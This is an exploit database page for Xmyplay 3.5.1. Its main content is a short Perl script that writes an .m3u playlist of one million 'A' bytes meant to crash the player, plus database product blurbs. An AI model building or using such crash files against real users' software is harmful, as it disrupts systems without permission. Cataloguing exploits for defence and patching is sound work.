Lucene search
+L

Xmyplay 3.5.1 - Denial of Service

🗓️ 31 Jul 2010 00:00:00Reported by s-dzType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 17 Views

Denial of Service vulnerability in Xmyplay 3.5.

Code
#!/usr/bin/perl
# Xmyplay 3.5.1
# Author: s-dz        , [email protected]
# Download : http://us2.un4seen.com/files/xmplay35.zip
# Tested : Windows XP SP2 (fr)
# DATE   : 2010-07-31

my $file= "mahboul-3lik00.m3u";
my $junk= "\x41" x  1000000;

open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("exploit created successfully");

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Aug 2010 00:00Current
5.3Medium risk
Vulners AI Score5.3
17